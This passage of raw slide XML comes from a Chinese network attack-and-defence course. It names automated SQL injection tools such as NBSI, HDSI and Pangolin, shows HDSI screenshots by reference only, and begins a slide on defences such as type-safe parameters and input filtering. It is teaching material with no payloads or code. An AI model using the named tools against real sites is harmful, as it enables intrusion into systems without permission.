            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471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777220D0-4DC9-8948-B139-A172F1363BAB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="188640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入攻击工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="4413250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入漏洞发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Wposion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>能够在动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>文档中找出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入漏洞的工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mieliekoek.pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>以网站镜像工具生成的输出为输入，找出含有表单页面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>允许在配置文件中对注入字符串进行修改</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>自动化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SPIKE Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>允许使用者对待注入字符串进行定制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SPI Toolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>工具包中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL Injector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>国内黑客界工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>NBSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>HDSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、阿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入工具、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>CSC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>WED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Pangolin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151880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EDC3F40E-9CFC-4C42-A968-B989FCB2F405}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>网络攻防技术与实践课程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Copyright (c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>诸葛建伟</a:t>
            </a:r>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79DD2F35-0B99-F341-A08F-C2B88AB02824}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691680" y="188640"/>
            <a:ext cx="8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>HDSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>自动注入工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1475656" y="1628800"/>
            <a:ext cx="6768752" cy="5229200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3830519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EDC3F40E-9CFC-4C42-A968-B989FCB2F405}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>网络攻防技术与实践课程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Copyright (c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>诸葛建伟</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481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79DD2F35-0B99-F341-A08F-C2B88AB02824}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1592897" y="260648"/>
            <a:ext cx="8001000" cy="459904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>HDSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>自动注入工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619672" y="1700808"/>
            <a:ext cx="6552728" cy="5157192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1545621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3"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7BF0DB2D-E6C9-6140-8EA6-5E0BCD92C7A1}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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238B6786-DE05-524F-8511-AFC59DFB39AE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="188640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入攻击防范措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用类型安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(type-safe)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的参数编码机制 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>凡是来自外部的用户输入，必须进行完备检查 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>限制、拒绝、净化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>URLScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>过滤器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>丢弃符合给定规则的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PHP v5.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>filter_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
